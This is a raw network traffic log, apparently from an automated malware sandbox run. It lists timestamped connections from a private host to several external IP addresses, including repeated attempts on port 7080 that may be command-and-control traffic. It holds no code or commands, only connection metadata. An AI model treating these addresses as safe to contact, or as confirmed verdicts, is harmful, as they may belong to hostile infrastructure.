Nov 13, 2022 19:26:57.754338980 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:57.754513025 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:57.754899025 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:57.754933119 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.193187952 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.193480015 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:58.198470116 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:58.198528051 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.198929071 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.199018955 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:58.199503899 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:58.199525118 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.747981071 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.748038054 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.748142958 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:58.748142958 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:58.748197079 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.748289108 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:58.748307943 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.748368979 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:58.961076975 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.961105108 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.961281061 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:58.961869001 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.962003946 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:58.962033987 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.962101936 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:58.963658094 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:58.963773966 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.168239117 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.168267012 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.168425083 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.168426037 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.168488979 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.168525934 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.168590069 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.168607950 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.168636084 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.168680906 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.169084072 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.169188976 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.169204950 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.169264078 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.170032978 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.170145035 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.171052933 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.171164036 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.171179056 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.171257019 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.171623945 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.171777010 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.375808001 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.376041889 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.376089096 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.376132965 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.376236916 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.376255035 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.376318932 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.376504898 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.376607895 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.376621008 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.376771927 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.376858950 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.376995087 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.377365112 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.377485037 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.377499104 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.377574921 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.377677917 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.377799034 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.378238916 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.378355026 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.378367901 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.378439903 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.379117966 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.379251003 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.379549980 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.379661083 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.379674911 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.379731894 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.380383015 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.380494118 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.380803108 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.380945921 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.380959988 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.381026983 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.381889105 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.382013083 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.382883072 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.383018017 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.383035898 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.383105040 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.582736015 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.582885027 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.583617926 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.583751917 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.583779097 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.583861113 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.584944010 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.585062027 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.586399078 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.586553097 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.586586952 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.586652040 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.587694883 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.587811947 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.588680029 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.588799953 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.588835001 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.588903904 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.589449883 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.589569092 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.590650082 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.590747118 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.590784073 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.591555119 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.591814995 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.591921091 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.592642069 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.592736959 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.592755079 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.592808008 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.593775034 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.593888998 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.594706059 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.594803095 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.594815016 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.594980001 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.595736980 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.595835924 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.597121000 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.597218990 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.597229958 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.597290039 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.598145008 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.599154949 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.599200010 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.599215984 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.599337101 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.600186110 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.600296974 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.601727962 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.601809978 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.601824999 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.601882935 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.602680922 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.602768898 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.603892088 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.603995085 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.604007959 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.604093075 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.604875088 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.605000973 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.605724096 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.605830908 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.605849028 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.605911970 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.606595039 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.606688976 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.607873917 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.607989073 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.608002901 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.608081102 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.609075069 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.609196901 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.609991074 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.610105991 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.610121012 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.610189915 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.789992094 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.790189981 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.790314913 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.790405989 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.792434931 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.792577982 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.792623043 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.792701960 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.793113947 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.793227911 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.796216965 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.796317101 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.796331882 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.796397924 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.796844959 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.796966076 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.796981096 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.797009945 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.797044992 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.797065973 CET	443	49701	41.63.0.22	192.168.2.3
Nov 13, 2022 19:26:59.797087908 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.797087908 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.797125101 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:26:59.797149897 CET	49701	443	192.168.2.3	41.63.0.22
Nov 13, 2022 19:27:03.481206894 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:03.733221054 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:03.733532906 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:03.733864069 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:03.992769003 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:03.996579885 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:03.996642113 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:03.996679068 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:03.996686935 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:03.996728897 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:03.996746063 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:03.996746063 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:03.996774912 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:03.996782064 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:03.996834993 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:04.238718033 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:04.238795042 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:04.238966942 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:04.491764069 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:04.492027998 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:04.754826069 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:04.755028009 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:05.015528917 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:05.015640974 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:05.274247885 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:05.274364948 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:05.536961079 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:05.537142038 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:06.569144011 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:06.569259882 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:06.807879925 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:06.807955027 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:06.808020115 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:06.808109045 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:07.048918009 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:07.048995018 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:07.049040079 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:07.049108982 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:08.597055912 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:08.597281933 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:11.937284946 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:11.937516928 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:12.179061890 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:12.179343939 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:18.625354052 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:18.625684023 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:31.265294075 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:31.265491962 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:31.504194021 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:31.504458904 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:31.754982948 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:31.755049944 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:31.755439043 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:32.009167910 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:32.009273052 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:32.254287958 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:32.254380941 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:32.494693041 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:32.494793892 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:32.734941006 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:32.737700939 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:32.976766109 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:32.977847099 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:33.219373941 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:33.219558954 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:33.459640980 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:33.459888935 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:33.698683977 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:33.698838949 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:33.940505981 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:33.940757036 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:33.992872000 CET	49705	443	192.168.2.3	173.255.211.88
Nov 13, 2022 19:27:33.992940903 CET	443	49705	173.255.211.88	192.168.2.3
Nov 13, 2022 19:27:33.993082047 CET	49705	443	192.168.2.3	173.255.211.88
Nov 13, 2022 19:27:33.997728109 CET	49705	443	192.168.2.3	173.255.211.88
Nov 13, 2022 19:27:33.997809887 CET	443	49705	173.255.211.88	192.168.2.3
Nov 13, 2022 19:27:34.184747934 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:34.185137033 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:34.423949957 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:34.424194098 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:34.663074970 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:34.663283110 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:34.907212973 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:34.907361984 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:35.156536102 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:35.156635046 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:39.588587999 CET	49707	443	192.168.2.3	173.255.211.88
Nov 13, 2022 19:27:39.588645935 CET	443	49707	173.255.211.88	192.168.2.3
Nov 13, 2022 19:27:39.588771105 CET	49707	443	192.168.2.3	173.255.211.88
Nov 13, 2022 19:27:39.592612982 CET	49707	443	192.168.2.3	173.255.211.88
Nov 13, 2022 19:27:39.592637062 CET	443	49707	173.255.211.88	192.168.2.3
Nov 13, 2022 19:27:45.883261919 CET	49705	443	192.168.2.3	173.255.211.88
Nov 13, 2022 19:27:51.342964888 CET	49709	7080	192.168.2.3	45.63.99.23
Nov 13, 2022 19:27:51.621084929 CET	49707	443	192.168.2.3	173.255.211.88
Nov 13, 2022 19:27:52.342434883 CET	49709	7080	192.168.2.3	45.63.99.23
Nov 13, 2022 19:27:52.774087906 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:27:52.774266958 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:27:54.342585087 CET	49709	7080	192.168.2.3	45.63.99.23
Nov 13, 2022 19:27:56.545253992 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:56.545454979 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:56.790478945 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:56.790735006 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:57.000451088 CET	49710	7080	192.168.2.3	45.63.99.23
Nov 13, 2022 19:27:57.029894114 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:57.030009985 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:57.030057907 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:57.030142069 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:57.030219078 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:57.271564007 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:57.271596909 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:57.271620035 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:57.271645069 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:57.271681070 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:57.510490894 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:57.510555983 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:57.510575056 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:57.510643959 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:57.749701977 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:57.749747992 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:57.749833107 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:57.749891043 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:57.999104023 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:57.999226093 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:58.000871897 CET	49710	7080	192.168.2.3	45.63.99.23
Nov 13, 2022 19:27:58.345587015 CET	49709	7080	192.168.2.3	45.63.99.23
Nov 13, 2022 19:27:58.799123049 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:58.799947023 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:59.038564920 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:59.038636923 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:59.038849115 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:59.039200068 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:27:59.285754919 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:59.285830975 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:27:59.286088943 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:00.002187967 CET	49710	7080	192.168.2.3	45.63.99.23
Nov 13, 2022 19:28:00.405267954 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:00.405371904 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:00.644279957 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:00.644351006 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:00.644399881 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:00.644416094 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:00.644479036 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:00.644479036 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:00.887914896 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:00.887980938 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:00.888026953 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:00.888025045 CET	49703	80	192.168.2.3	81.68.152.197
